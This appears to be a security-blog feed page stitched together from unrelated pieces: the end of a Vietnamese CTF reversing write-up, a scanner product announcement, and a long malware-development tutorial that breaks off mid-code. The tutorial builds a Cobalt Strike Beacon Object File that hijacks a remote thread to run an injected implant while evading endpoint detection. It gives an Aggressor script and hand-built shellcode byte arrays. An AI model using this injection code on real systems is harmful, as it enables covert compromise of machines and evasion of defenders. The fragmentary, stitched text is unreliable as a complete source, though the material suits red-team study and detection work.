  • Cách mình lật ngược cái đoạn code check flag như thế này:
    • Mình tìm đoạn text in ra flag -> đặt nhãn mới cho đoạn code này
    • Tìm tiếp cái đoạn “No! Try another key!” kìa -> đặt tiếp cái nhãn đến đó
    • Và bắt đầu lật ngược code từ chỗ in flag lên Có đến 9 lệnh JMP đến cái nhãn No_flag => đoán sơ sơ ban đầu chắc 1 lần check leng, 8 lần check flag.
    • Nếu lật ngược lên từ đoạn code in flag thì có thể nhận ra dễ dàng là nó sẽ kiểm tra flag sau đó nếu thỏa mãn nó sẽ nhảy sang đoạn code check flag tiếp nếu k nó sẽ Jmp No_flag
    • Cứ như vậy cho đến đầu code (làm thế này rất nhanh mà không phải mò mẫm khi cứ thế trâu bò debug luôn) thì thấy đoạn check leng của flag:
  • Khi xong xuôi thì có thể debug luôn :v. tìm flag nhưng code vẫn còn rối với nhiều mov lắm, trace ra cờ chắc cũng mất thời gian. Nhưng trong lúc mình truy ngược lên mình có để ý ở trong các hàm check flag là code trong đó phần lớn là giống nhau, giống đoạn đầu code (đoạn jmp đến) cũng như đoạn cuối code (đoạn jmp đi) cấu trúc là như nhau vậy thì giữa code :v…
mov R3, edx
   mov R2, value
mov eax, R3
mov edx, R2
    • Cái mẩu code này là chìa khóa giải bài này cái giá trị value kia sẽ thay đổi qua từng lần JMP và tất cả các giá trị đó mình nhặt ra đây:
    • [8,0x71,0x69,0x65,0x65,0x76,0x74,0x69,0x74] => [qieevtit]
  • Cái số 8 kia có thể là độ dài của flag
  • Nhập thử thì đây không phải flag, bị hoán đổi vị trí rồi. Nhìn là nghĩ ngay đên brute chứ ngại debug cái đống code kia lắm. Do thời gian này đang học dùng mấy cái tool kiểu như z3, angr (mình gà lắm chả biết mấy cái tool này ,mấy bài mà giải được bằng nó thì toàn lôi notepad++ ra nháp).
  • Để mò nốt cái flag kia là gì mình dùng pin tool cái này đọc trong blog của sư phụ mình lâu rồi cái này mình thấy rất hay. Cái tool này đơn thuần là đếm số lệnh nó thực hiện khi chạy. Vậy thì mình sẽ thử vị trí của cái đống kí tự kia nếu số lượng lệnh tang lên theo các lần thử thì vị trí đó đúng nếu k thì sai :v. Và đây là code slove mình viết bằng python chạy khá ổn nhưng mà chậm không biết làm thế nào cho nhanh.
  • Mình chỉ thắc mắc là chỗ check leng của bài này. Khi xài tool kiểm tra lại leng của flag thì thấy lạ là đối với flag dài 7 kí tự đổ xuống thì số lệnh sẽ tăng lên dần dần, nhưng đến khi 8 kí tự trở lên thì số lệnh giảm 1 xíu so với leng = 7 và nó k thay đổi từ đó => mình vẫn mập mờ với cái đoạn check leng này. Nếu mà thế kia thì đoạn code check leng của tác giả khéo là chỉ kiểm tra nó >= 8, hoặc là gì gì đó mà mình không biết.
Và đây là kết quả mình thử lấy flag với pin tool:

=)) tieqviet
Và lấy flag di sub wôi:

Announcing ECG v2.0

11 January 2021 at 13:39
By: voidsec

We are proud to announce that ECG got its first major update. ECG: is the first and single commercial solution (Static Source Code Scanner) able to analyze & detect real and complex security vulnerabilities in TCL/ADP source-code. ECG’s v2.0 New Features On-Premises Deploy: Scan your code repository on your secure and highly-scalable offline appliance with a local […]

The post Announcing ECG v2.0 appeared first on VoidSec.

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00

Introduction

As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to delineate this post will be focused on the technique of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As was aforementioned, Cobalt Strike is widely adopted and I think it is a great tool and I am a big proponent of it. I still believe at the end of the day, however, it is more important to understand the overarching concept surrounding a TTP (Tactic, Technique, and Procedure), versus learning how to just arbitrarily run a tool, which in turn will create a bottleneck in your red teaming methodology by relying on a tool itself. If Cobalt Strike went away tomorrow, that shouldn’t render this TTP, or any other TTPs, useless. However, almost contradictory, this first portion of this post will briefly outline what Beacon Object Files are, a quick recap on remote process injection, and a bit on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefit of BOFs are twofold:

  1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Window APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows APIs being called in order to allocate some memory in the other process, write user-defined memory (usually a shellcode of some sort) to that allocation, and kicking off execution by create a thread within the remote process. The APIs, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are often popular choices, respectively.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also under what user context a certain process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below where a second process listing is performed where another user, ANOTHERUSER has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the OTHERUSER user.

This is useful to a red team operator, as the credentials for the OTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including the addition of endpoint detection and response (EDR) products that detect on such behavior. One of the indicators of compromise (IOC) would be, in this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process must already be existing with an access right of at least PROCESS_VM_OPERATION in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. A handle to the target process must already be existing with an access right of at least PROCESS_WRITE and the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the former thread handle mentioned as the argument. SuspendThread requires the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread will run the DllMain function until the operator exits the Beacon, since the stageless raw Beacon artifact does not perform a “return”. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run. Essentially, this is one of three components our “new” full payload will “carry”, so when execution reaches the remote process, the call to CreaeteThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant, it will actually execute a small shellcode, made up of three components, that places the Beacon implant into its own local thread, along with a two other routines that will be described here shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component’s purpose.
  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large “final payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated to point the DWORD.Rip member, which represents the value of the 64-bit instruction pointer, to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.

Before moving on, there are two things I would like to call out. The first is the call to CreateThread. At first glance, this may seem like it is not a viable alternative to CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process, it is created locally. This does a few things, including avoiding the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread and secondly, by blending in (a bit more) by calling CreateThread, which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with come code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek” the prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to our function prototypes, as the prototypes of most Windows API functions contain a #define directive with a definition of WINBASEAPI, or similar, which already contains a __declspec(dllimport) keyword. An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses from, like functions other libraries or object files, will point to the prototyped LIB$Function functions memory address. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as a code to be executed. Not reinventing the wheel here, Raphael outlines this all in his wonderful video.

In addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, that are outlined in the beacon.h header file, supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output over Beacon. This API accepts a user-supplied string, as well as #define directive in beacon.h, namely CALLBACK_OUTPUT and CALLBACK_ERROR. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Alias for Beacon ID and args
    local('$bid $listener $pid $payload');
    
    # Set the number of arguments
    ($bid, $pid, $listener) = @_;

    # Determine the amount of arguments
    if (size(@_) != 3)
    {
        berror($bid, "Error! Please enter a valid listener and PID");
    return;
    }

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);
    closef($handle);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
    {
        berror($bid, "Please enter a valid PID!\n");
        return;
    }

    # Generate a new payload 
    $payload = payload_local($bid, $listener, "x64", "thread");
    $handle1 = openf(">out.bin");
    writeb($handle1, $data1);
    closef($handle1);
    
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);
}

The goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack, a PID for injection and the name of the Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, listener name, the PID, and payload, which will be generated later. The @_ statement sets an array with the order our arguments will be supplied to the BOF, mean the command to use this BOF would be cThreadHijack "Name of listener" PID. After, error checking is done to determine if 3 arguments have been supplied (two for the PID and listener and the Beacon ID, the third argument, will be supplied to the BOF without us needing to input anything). After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer and the newly created $payload variable is packed as a binary value. Then, upon execution in Cobalt Strike, the alias cThreadHijacked is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that details on adhering to BOF’s rules while writing C is out of the way, let’s get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to first open a handle to the target process. As mentioned before, calls that utilize this handle, VirtualAllocEx and WriteProcessMemory, must have a total access right of PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

As mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address space of the calling function. Since we will be injecting this routine into the remote process, when the routine executed, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a local thread - but since the routine will be executed inside of the remote process, it will spawn a local thread, instead of requiring us to create a thread, remotely, from our current process.

The function argument we will be worried about is LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let’s get into the development of the routine.

The first step is to declare a BYTE array of 64-bytes. 64-bytes was chosen, as it is divisible by a QWORD, which is a 64-bit address. This is to ensure proper alignment, meaning 8 QWORDS will be used for this routine - which keeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { NULL };
int z = 0;

Since we are working on a 64-bit system, we must adhere to the __fastcall calling convention. This calling convention requires the first four integer arguments (floating-point values are passed in different registers) are passed in the RCX, RDX, R8, and R9 registers, respectively. However, the question remains - CreateThread has a total of six parameters, what do we do with the last two? With __fastcall, the fifth and subsequent parameters are located on the stack at an offset of 0x20 and every 0x8 bytes subsequently. This means, for our purposes, the fifth parameter will be located at RSP + 0x20 and the sixth will be located at RSP + 0x28. Here are the parameters used for our purposes.

  1. lpThreadAttributes will be set to NULL. Setting this value to NULL will ensure the thread handle isn’t inherited by child processes.
  2. dwStackSize will be set to 0. Setting this parameter to 0 forces the thread to inherit the default stack size for the executable, which is fine for our purposes.
  3. lpStartAddress, as previously mentioned, will be the address of our shellcode. This parameter is a function pointer to be executed by the thread.
  4. lpParameter will be set to NULL, as our thread does not need to inherit any variables.
  5. dwCreationFlags will be set to 0, which informs the thread we would like to thread to run immediately after it is created. This will kick off our Beacon implant, after thread creation.
  6. lpThreadId will be set to NULL, which is of less importance to us - as this will not return a thread ID to the LPDWORD pointer parameter. Essentially, we could have passed a legitimate pointer to a DWORD and it would have been dynamically filled with the thread ID. However, this is not important for purpose of this post.

The first step is to place a value of NULL, or 0, into the RCX register, for the lpThreadAttributes argument. To do this, we can use bitwise XOR.

// xor rcx, rcx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

This performs bitwise XOR with the same two values (RCX), which results in 0 as bitwise XOR with two of the same values results in 0. The result is then placed in the RCX register. Synonymously, we can leverage the same property of XOR for the second parameter, dwStackSize, which is also 0.

// xor rdx, rdx
createThread[z++] = 0x48;
createThread[z++] = 0x31;
createThread[z++] = 0xd2;

The next step, is really the only parameter we need to specify a specific value for, which is lpStartAddress. Before supplying this parameter, let’s take a quick look back at our first injection, which planted the Beacon implant into the desired remote process.

The above code returns the virtual memory address of our allocation into the variable placeRemotely. As can be seen, this return value is of the data type LPVOID, while the lpStartParameter argument takes a data type of LPTHREAD_START_ROUTINE, which is pretty similar with LPVOID. However, for continuity sake, we will first type cast this allocation into an LPTHREAD_START_ROUTINE function pointer.

// Casting shellcode address to LPTHREAD_START_ROUTINE function pointer
LPTHREAD_START_ROUTINE threadCast = (LPTHREAD_START_ROUTINE)placeRemotely;

In order to place this value into the BYTE array, we will need to use a function that can copy this address to the buffer, as the BYTE array will only accept one byte at a time. There is a limitation however, as BOFs do not link C-Runtime functions such as memcpy. We can overcome this by creating our own custom memcpy routine, or grabbing one from the MSVCRT library, which Cobalt Strike can link to us. However, for now and for awareness of others, we will leverage a libc.h header file that Raphael created, which can be found here.

Using the custom mycopy function, we can now perform a mov r8, LPTHREAD_START_ROUTINE instruction.

// mov r8, LPTHREAD_START_ROUTINE
createThread[z++] = 0x49;
createThread[z++] = 0xb8;
mycopy(createThread + z, &threadCast, sizeof(threadCast));
z += sizeof(threadCast);

Notice how the end of this small shellcode blob contains an update for the array index counter z, to ensure as the array is written to at the correct index. We have the luxury of using a mov r8, LPTHREAD_START_ROUTINE, as our shellcode pointer has already been mapped into the remote process. This will allow the CreateThread routine to find this function pointer, in memory, as it is available within the remote process address space. We must remember that each process on Windows has its own private virtual address space, meaning memory in one user mode process isn’t visible to another user mode process. As we will see with the NtContinue stub coming up, we will actually have to embed the preserved CONTEXT record of the hijacked thread into the payload itself, as the structure is located in the current process, while the code will be executing within the desired remote process.

Now that the lpStartAddress parameter has been completed, lpParameter must be set to NULL. Again, this can be done by utilizing bitwise XOR.

// xor r9, r9
createThread[z++] = 0x4d;
createThread[z++] = 0x31;
createThread[z++] = 0xc9;

The last two parameters, dwCreationFlags and lpThreadId will be located at an offset of 0x20 and 0x28, respectively, from RSP. Since R9 already contains a value of 0, and since both parameters need a value of 0, we can use to mov instructions, as such.

// mov [rsp+20h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x20;

// mov [rsp+28h], r9 (which already contains 0)
createThread[z++] = 0x4c;
createThread[z++] = 0x89;
createThread[z++] = 0x4c;
createThread[z++] = 0x24;
createThread[z++] = 0x28;

A quick note - notice that the brackets surrounding each [rsp+OFFSET] operand indicate we would like to overwrite what that value is pointing to.

The next goal is to resolve the address of CreateThread. Even though we will be resolving this address within the BOF, meaning it will be resolved within the current process, not the desired remote process, the address of CreateThread will be the same across processes, although each user mode process is mapped its own view of kernel32.dll. To resolve this address, we will use the following routine, with BOF denotations in our code.

// Resolve the address of CreateThread
unsigned long long createthreadAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("kernel32"), "CreateThread");

// Error handling
if (createthreadAddress == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve CreateThread. Error: 0x%lx\n", KERNEL32$GetLastError());
}

The unsigned long long variable createthreadAddress will be filled with the address of CreateThread. unsigned long long is a 64-bit value, which is the size of a memory address on a 64-bit system. Although KERNEL32$GetProcAddress has a prototype with a return value of FARPROC, we need the address to actually be of the type unsigned long long, DWORD64, or similar, to allow us to properly copy this address into the routine with mycopy. The next goal is to move the address of CreateThread into RAX. After this, we will perform a call rax instruction, which will kick off the routine. This can be seen below.

// mov rax, CreateThread
createThread[z++] = 0x48;
createThread[z++] = 0xb8;
mycopy(createThread + z, &createthreadAddress, sizeof(createthreadAddress));
z += sizeof(createthreadAddress);

// call rax (call CreateThread)
createThread[z++] = 0xff;
createThread[z++] = 0xd0;

Additionally, we want to add a ret opcode. The way our full payload will be setup is as follows:

  1. A call to the stack alignment/CreateThread routine will be made firstly (the stack alignment routine will be hit on in a latter portion of this blog). When a call instruction is executed, it pushes a return address onto the stack. This is the address that ret will jump to in order to continue execution of the payload. When the stack alignment/CreateThread routine is called, it will push a return address onto the stack. This return address will actually be the address of the NtContinue routine.
  2. We want to end our stack alignment/CreateThread routine with a ret instruction. This ret will force execution back to the NtContinue routine. This will all be outlined when executed is examined inside of WinDbg.
  3. The call to the stack alignment/CreateThread routine is actually going to be a part of the NtContinue routine. The first instruction in the NtContinue routine will be a call to the stack alignment/CreateThread shellcode, which will then perform a ret back to the NtContinue routine, where thread execution will be restored. Here is a quick visual.

PAYLOAD = NtContinue shellcode calls stack alignment/CreateThread shellcode -> stack alignment/CreateThread shellcode executes, placing Beacon in its own local thread. This shellcode performs a return back to the NtContinue shellcode -> NtContinue shellcode finishes executing, which restores the thread

In accordance with out plan, let’s end the CreateThread routine with a 0xc3 opcode, which is a return instruction.

// Return to the caller in order to kick off NtContinue routine
createThread[z++] = 0xc3;

Let’s continue by developing a NtContinue shellcode routine. After that, we will develop a stack alignment shellcode in order to ensure the stack pointer is 16-byte aligned, when the first call occurs in our final payload. Once we have completed both of these routines, we will walk through the entire shellcode inside of the debugger.

“Never in the Field of Human Conflict, Was So Much Owed, by So Many, to NtContinue

Up until now, we have achieved the following:

  1. Our shellcode has been injected into the remote process.
  2. We have identified a remote thread, which we will later manipulate to execute our Beacon implant
  3. We have created a routine that will place the Beacon implant in its own local thread, within the remote process, upon execution

This is great, and we are almost home free. The issue remains, however, the topic of thread restoration. After all, we are taking a thread, which was performing some sort of action before, unbeknownst to us, and forcing it to do something else. This will certainly result in execution of our shellcode, however, it will also present some unintended consequences. Upon executing our shellcode, the thread’s CPU registers, along with other information, will be out of context from the actions it was performing before execution. This will cause the the process housing this thread, the desired remote process we are injecting into, to most likely crash. To avoid this, we can utilize an undocumented ntdll.dll function, NtContinue. As pointed out in Alex Ionescu and Yarden Shafir’s R.I.P ROP: CET Internals in Windows 20H1 blog post, NtContinue is used to resume execution after an exception or interrupt. This is perfect for our use case, as we can abuse this functionality. Since our thread will be mangled, calling this function with the preserved CONTEXT record from earlier will restore execution properly. NtContinue accepts a pointer to a CONTEXT record, and a parameter that allows a programmer to set if the Alerted state should be removed from the thread, as outlined in its function prototype. We need not worry about the second parameter for our purposes, as we will set this parameter to FALSE. However, there remains the issue of the first parameter, PCONTEXT.

As you can recall in the former portion of this blog post, we first preserved the CONTEXT record for our hijacked thread, within our BOF code. The issue we have, however, is that this CONTEXT record is sitting within the current process, while our shellcode will be executed within the desired remote process. Because of the fact each user mode process has its own private address space, this CONTEXT record’s address is not visible to the remote process we are injecting into. Additionally, since NtContinue does not accept a HANDLE parameter, it expects the thread it will resume execution for is the current calling thread, which will be in the remote process. This means we will need to embed the CONTEXT record into our final payload that will be injected into the remote process. Additionally, since NtContinue restores execution of the calling thread, this is why we need to embed an NtContinue shellcode into the final payload that will be placed into the remote process. That way, when the hijacked thread executes the NtContinue routine, restoration of the hijacked thread will occur, since it is the calling thread. With that said, let’s get into developing the routine.

Synonymous with our CreateThread routine, let’s create a 64-byte buffer and a new counter.

BYTE ntContinue[64] = { NULL };
int i = 0;

As mentioned earlier, this NtContinue routine is going to be the piece of code that actually invokes the CreateThread routine. When this NtContinue routine performs the call to the CreateThread routine, it will push a return address on the stack, which will be the next instruction within this NtContinue shellcode. When the CreateThread shellcode performs its return, execution will pick back up inside of the NtContinue shellcode. With this in mind, let’s start by using a near call, which uses relative addressing, to call the CreateThread shellcode.

The first goal is to start off the NtContinue routine with a call to the CreateThread routine. To do this, we first need to calculate the distance from this call instruction to the location of the CreateThread shellcode. In order to properly do this, we need to take one thing into consideration, and that is we need to also carry the preserved CONTEXT record with us, for use, in the NtContinue call. To do this, we will use a near call procedure. Near calls, in assembly, do not call an absolute address, like the address of a Windows API function, for instance. Instead, near call instructions can be used to call a function, relative to the address in the instruction pointer. Essentially, if we can calculate the distance, in a DWORD, to the CreateThread routine, we can just invoke the opcode 0xe8, along with a DWORD to represent the distance from the current memory location, in order to dynamically call the CreateThread routine! The reason we are using a DWORD, which is a 32-bit value, is because the x86 instruction set, which is usable by 64-bit systems, allows either a 16-bit or 32-bit relative virtual address (RVA). However, this 32-bit value is sign extended to a 64-bit value on 64-bit systems. More information on the different calling mechanisms on x86_64 systems can be found here. The offset to our shellcode will be the size of our NtContinue routine plus the size of a CONTEXT record. This essentially will “jump over” the NtContinue code and the CONTEXT record, in order to first execute the CreatThread routine. The corresponding instructions we need, are as follows.

// First calculate the size of a CONTEXT record and NtContinue routine
// Then, "jump over shellcode" by calling the buffer at an offset of the calculation (64 bytes + CONTEXT size)

// 0xe8 is a near call, which uses RIP as the base address for RVA calculations and dynamically adds the offset specified by shellcodeOffset
ntContinue[i++] = 0xe8;

// Subtracting to compensate for the near call opcode (represented by i) and the DWORD used for relative addressing
DWORD shellcodeOffset = sizeof(ntContinue) + sizeof(CONTEXT) - sizeof(DWORD) - i;
mycopy(ntContinue + i, &shellcodeOffset, sizeof(shellcodeOffset));

